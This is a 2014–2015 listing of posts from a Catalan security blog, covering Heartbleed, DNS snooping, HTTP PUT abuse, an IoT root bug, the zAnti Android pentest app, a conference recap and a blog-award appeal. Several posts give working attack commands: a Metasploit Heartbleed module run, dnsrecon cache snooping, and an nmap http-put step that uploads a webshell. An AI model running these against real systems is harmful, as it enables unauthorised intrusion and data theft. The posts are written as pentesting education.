Mig any després del HeartBleed

•15 gener 2015 • Feu un comentari

Ja fa pràcticament mig any que es va publicar el bug del HeartBleed.  Un error que, tractanse de OpenSSL, afectava a una gran quantitat de serveis i al qual fins hi tot s’hi ha dedicat una entrada a la Vikipèdia.  Segurament ha estat un dels bugs més mediàtics de l’any passat, i ens recordava a tots que fins i tot les peces de software tan bàsiques, on reposem les nostres confiances de seguretat, com és la capa d’encriptació SSL tampoc son invulnerables.  Potser per això s’hi va fer tant escàndol.

El curiós del cas és que encara a dia d’avui, i tot el revol que va generar, et pots trobar forces serveis amb versions vulnerables a l’atac.

Per verificar-ho amb NMap simplement podem utilitzar el seu script que a l’última versió ve integrat.

nmap –script ssl-heartbleed <host>

Resultat de analitzar HeartBleed amb NMap.  El host és vulnerable!

Resultat de analitzar HeartBleed amb NMap. El host és vulnerable!

Si algun dels nostres serveis és vulnerable NMap ens ho indicarà.

Arribats a aquest punt l’explotació també és tribial amb Metasploit.  Tan sols fem:

use auxiliary/scanner/ssl/openssl_heartbleed

set VERBOSE true

set RHOSTS <host>

run

Executem l'atac amb Metasploit

Executem l’atac amb Metasploit

I ens mostrarà el resultat de l’atac.

Part de la informació exposada arrel de l'atac amb HeartBleed.

Part de la informació exposada arrel de l’atac amb HeartBleed.

Però realment és tan greu? Doncs estrictament parlant, el HeartBleed retorna un pedaç de la memòria RAM del servidor. La major part dels cops aquest resultat tan sols conté parts dels processos actius, com per exemple, parts de les webs que s’estan mostrant, part del contingut del document que s’està servint, etc.  Aquests no revelen a priori dades de gran importància i algú podria pensar que és “passable”, però ja ens poden oferir informació suculent en forma de rutes del sistema de fitxers del servidor, software instal·lat, informació continguda en parts de la web on no hi tenim accés, etc.  Si l’atacant està te sort la informació retornada pot contenir passwords en format hash, credencials, noms d’usuaris, etc i aleshores si que tenim un problema greu.

Per tant, aquest atac té un impacte aleatori depenent de la informació que quedi exposada.  Tanmateix sempre retorna informació que pot ser utilitzada en un hacking i, junt amb la possibilitat de exposar informació realment crítica, aquest atac ha merescut l’atenció que s’hi va fer en el seu moment en els medis de comunicació.

…llàstima que encara hi hagin administradors que no s’hagin adonat del perill…

Anuncis

Obtenció d’informació mitjançant DNS Snooping i dnsrecon

•8 gener 2015 • Feu un comentari

Avui us vull mostrar com obtenir informació d’un servidor vulnerable a DNS Snooping, cosa molt interessant dins d’un procés de hacking ètic.  Mitjançant aquesta tècnica forçarem a resoldre de forma local (via mapeig o mitjançant la cache) un seguit de dominis a un servidor DNS.  D’aquesta forma podrem saber quins dominis acostuma resoldre el servidor DNS objectiu la qual cosa ens acabarà indicant:

  • Hàbits de navegació:  Els hàbits de navegació dels usuaris que utilitzen aquest servidor DNS.  Aquesta informació ens facilitarà la confecció i efectivitats de tècniques com Enginyeria Social, APT (Advanced Persisten Threats), diferents tipus de Spoofings, etc.
  • Software i tecnologies emprades dins de l’organització:  Donat que la major part del software i hardware avui dia cerca actualitzacions de forma automàtica, si disposem d’un bon repertori de dominis, podríem esbrinar quin tipus de programes i tecnologies utilitza internament l’empresa.  Podem saber si utilitzen Windows, quines distribucions de Linux ens trobarem, si utilitza FireFox, Chrome o Opera, els lectors de PDF que utilitzen, si s’hi connecten els mòbils dels treballadors, etc.  No cal explicar el potencial que ens ofereix disposar d’aquesta informació: cercar tecnologies vulnerables, recopilar exploits específics, spoofing d’actualitzacions, etc.

Com ja heu vist, la tècnica és molt interessant i un imprescindible en les primeres fases de un pentesting o auditoria de seguretat.

Per a realitzar aquesta tècnica tenim disponibles varies eines, en la distribució de Kali Linux podem emprar per exemple dnsrecon.  La sintaxis seria la següent:

dnsrecon -t snoop -n <ip_servidor_dns> -D <arxiu_llistat_dominis_a_verificar>

Un exemple pràctic:

Resultat d'execució de DNS Snooping amb dnsrecon.

Resultat d’execució de DNS Snooping amb dnsrecon.

Com podeu veure en la imatge anterior, el servidor DNS tan sols respon als dominis que te mapejats o ha resolt anteriorment.  En aquest exemple l’arxiu dominis.txt contenia pocs dominis, per a fer una prova ràpida, però ja ens indica que mai han visitat el meu bloc (molt malament!) i no utilitzen Kali Linux ni Ubuntu.  Si elaborem un llistat prou extens i amb una mica de idea (cercant identificar programari, S.O., etc) aquesta tècnica ens pot donar grans resultats.

Sigueu feliços!

Aprofitant el metode PUT de HTTP/1.1 per comprometre un servidor web

•15 Desembre 2014 • Feu un comentari

De tant en tant ens podem trobar en l’auditoria, o hacking ètic, que ens apareix el servidor web del client amb el mètode PUT habilitat.  Lluny de ser una fotesa pot representar el millor i més fàcil punt d’entrada al sistema ja que ens permetrà pujar arxius al servidor.

L’estàndard HTTP/1.1 defineix tota una sèrie de mètodes per a interactuar amb els servidors Web, entre ells els típics GET i POST junt amb alguns de més perillosos com PUT, DELETE i TRACE.  Avui farem un cop d’ull al mètode PUT.

NMap ens ajudarà molt a cercar i treballar amb aquesta vulnerabilitat, gràcies a els seus scripts afegits.  Per exemple podem cercar servidors web i obtenir un llistat dels mètodes suportats gràcies a la consulta de OPTIONS:

nmap –script=http-methods.nse –script-args http-methods.retest=1 <IP>

Això ens retornarà quelcom com això:

80/tcp open http
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
| See http://nmap.org/nsedoc/scripts/http-methods.html
| GET / -> HTTP/1.1 200 OK
| HEAD / -> HTTP/1.1 200 OK
| POST / -> HTTP/1.1 200 OK
| PUT / -> HTTP/1.1 200 OK
| OPTIONS / -> HTTP/1.1 200 OK
|_TRACE / -> HTTP/1.1 200 OK

En cas de aparèixer el mètode PUT entre el llistat, haurem obtingut confirmació de que el servidor és vulnerable.

També podem fer la comprovació “a mà” amb netcat:

nc <IP> 80
OPTIONS / HTTP/1.1
Host: <IP>

Un cop confirmat, el servidor ens permetrà pujar arxius arbitraris, com una webshell, utilitzant per exemple un altre script de NMap:

nmap -p 80 --script http-put --script-args http-put.url='/webshell.php',http-put.file='./webshell.php'

I a partir d’aquí ja tenim el primer pas del pentest aconseguit: un peu dins del sistema!

Després de la ressaca de la No cOn Name 2014

•3 Novembre 2014 • Feu un comentari

La No cON Name d’aquest 2014 ha estat realment bé:  Dos dies plens de conferències pràcticament sense sortir en 12 hores del CosmoCaixa (un cop acabat de dinar era bon moment per visitar-lo), el CTF i els tallers han estat perfectament organitzats per no dir que el fet de tenir-la aquí Barcelona ha estat tot un luxe!  La majoria de ponències, independentment del tema, han demostrat el alt nivell que hi ha en aquest país respecte la seguretat informàtica, reversing i hacking en general.

M’ha agradat molt veure viu l’esperit hacker, no tan sols a nivell de seguretat de la informació sinó també referent al sol fet d’entendre com funcionen les coses i donar-hi la volta per a que funcionin diferents.  Exemples d’això han estat les ponències de “Mitigando ataques Wifi al control remoto de Drones” de David Meléndez on re-escrivia els protocols WiFi per a millorar la seguretat del control del seu Drone (i evitar així que l’hi tornessin a hackejar els assistents a la No cON!) o el reversing del Street Fighter II Turbo de Pau Oliva.

D’altres ponències han demostrat alt nivell tècnic en tècniques anti-forense, com a de Daniel O’Grady on explicava l’estructura dels discos durs i com escriure un driver per poder accedir als cilindres negatius. I finalment les esperades sobre atacs o escanig de xarxes com la de Ricard Martín, Alfonso Muñoz i Antonio Guzmán que explicaven com era possible fer un scanner de IPs locals i ports utilitzant tan sols una web HTML, i saltant-nos així absolutament totes les defenses perimetrals!

Tanmateix el millor no acostumen a ser les ponències sinó les converses i la gent.  Vaig parar bé l’orella en els col·loquis i em va sorprendre (o no) descobrir que les empreses no es queixaven del nivell dels professionals sinó de dues coses:

1.- Que no tenien estudis reglats en la seva majoria i que les universitat haurien d’establir currículums entorn aquestes especialitzacions.  També demanaven que els docents estimulessin més a l’alumnat per inculcar-los la curiositat i l’esforç.

2.- La major part del empleats, tot i ser molt bons tècnicament, tenien una greu carència alhora de redactar informes, estructurar idees i comunicar-les!

També va quedar p

alès que ,tot i haver mercat, sembla que la majoria de talents que tenim estan marxen a altres paisos, com els EEUU, ja que les condicions salarials son sustancialment millors.

Amb tot una experiència molt grata que caldrà repetir i moltes idees de tornada a casa que cal meditar i reposar.

Per cert, a la web de la No cON Name estan fent reformes i penjant tot els material de les ponències des del congrés del 2010.  Tot i que el d’enguany encara no hi és, no crec que triguin gaire en distribuir-lo.

A seguretat informàtica no s’acabarà la feina

•30 Octubre 2014 • Feu un comentari

No em puc resistir a fer aquesta petita reflexió: en el camp de la seguretat informàtica està clar que tindrem feina per temps.

Ahir, com cada dia, vaig estar repassant els nous bugs descoberts i indagant una mica més en aquells que semblaven interessants.  Un d’ells em va esgarrifar, i no precisament per la seva complexitat.

Es tracta d’un bug descobert en el software xinés de Konke Smart Plug K que permet aconseguir privilegis de root en el dispositiu.  L’explotació és tan senzilla com connectar-s’hi per telnet al port 23 i automàticament ja tens privilegis de root sense que el dispositiu el demani cap mena de contrasenya!

Per a mi aquests tipus d’exemples, lluny de ser anècdotes aïllades, son clars indicadors de la poca cura que s’hi dedica a la seguretat dels sistemes informàtics i de la informació per part les empresses (proveïdores o clients).  Mostra una cultura de la seguretat pràcticament nul·la i dibuixa un futur ple de feina per als que treballem en aquest sector, sempre i quan aconseguim conscienciar algú de que realment ens necessiten.

Eines per a pentesting des de Android

•16 Octubre 2014 • Feu un comentari

Pantalla principal de zAnti

Arrel de l’entrada de’n Álvaro Paz a Guru de la informática he començat a trastejar una aplicació per al pentesting des de Android.  zAnti no és la primera aplicació d’aquest tipus que provo en Android, també existeix la ja famosa dSploit.  Tanmateix he de dir que és la primera on l’opció de MitM ha funcionat sense cap mena de problemes i les opcions que ofereix superen amb escreix  a dSploit.

Un MitM des de Android i amb un parell de “clics”? Doncs si, tan senzill com obrir l’aplicació i deixar que faci un escaneig la xarxa on estem connectats, triar l’objectiu i demanar un atac MitM!!! A més, disposa de moltes més opcions.  Un llistat no exhaustiu sobre les seves característiques és:

  • MAC Changer
  • zTether
  • RouterPwn
  • Cloud Reports
  • Wifi Monitor
  • HTTP Server
  • Escaneix de xarxa (identifica equips, mac, sistema operatiu, ports oberts).
  • Escaneig de vulnerabilitats, on permet generar informes.
  • Escaneig avançat sobre un host determinat.
  • Connexió a un port determinat.
  • Atacs de diccionari i força bruta sobre molts protocols (smb, ftp, http….)
  • MitM (ARP i ICMP)
    • Captura de paquets (i contrasenyes)
    • captura d’imatges
    • Edició de paquets interactiva.
    • SSL Strip !!
    • Re-direcció de trafic a la teva IP (per això la funció de servidor HTTP)
    • Reemplaçar imatges,
    • Reemplaçar descàrregues (aquestes APK…)
    • Inserir codi HTML a les pàgines web sol·licitades (super interessant!)

A més, tot és molt intuïtiu i permet un alt nivell de configuració i personalització, cosa que és d’agrair. Com podeu veure és tot un monstre amb el qual, en un parell de clics, podeu testejar qualsevol xarxa en qüestió de minuts, inclús abans de sortir de firmar el contracte de l’auditoria!

Pantalla d’atac MitM

Sens dubte intentarem treure partit d’aquesta eina i ja us explicaré els resultat, ara per ara molt prometedors.

Premis Bitacoras.com 2014

•10 Octubre 2014 • Feu un comentari

Comença a ser una mala costum, ho sé, però de fet crec que m’ajuda.  L’arribada dels premis bitacoras.com 2014 durant l’octubre fa que coincideixi amb la fi del meu període vacacional i amb la tornada a posta a punt del bloc per a la nova temporada.

Aquesta coincidència, a part de semblar propícia, fa que torni a agafar el bloc amb forces.  Per desgràcia també coincideixen les votacions d’aquests premis amb un període previ molt vegetatiu del bloc, cosa que fa que els lectors no estiguin gaire al cas.

Tot i així, sapigueu que torno a estar actiu, i com cada any us agrairia el vostre vot a aquests premis.

No tinc pretensions sobre les classificacions.  No ens enganyem, competim amb bloc amb gran nivell i calatge internacional.  Tanmateix sempre és un orgull participar i aparèixer a les llistes i més pensant que possiblement sigui l‘únic bloc escrit exclusivament en català.

L’anterior edició, la primera en la que participava, alquimiabinaria.cat quedava dintre del primer quartil, tot un èxit tenint en compte que la llengua vehicular del bloc és exclusivament el català i per tant els possibles votants un nombre molt reduït si comparem amb bloc en castellà on pot votar un volum enorme de persones (espanyol, llatinoamericans, etc…)

Així doncs us torno a demanar la participació, deu minuts de feina, i que voteu per alquimiabinaria.cat a la secció de Bloc de Seguretat Informàtica.

Votar en los Premios Bitacoras.com
Moltes gràcies companys!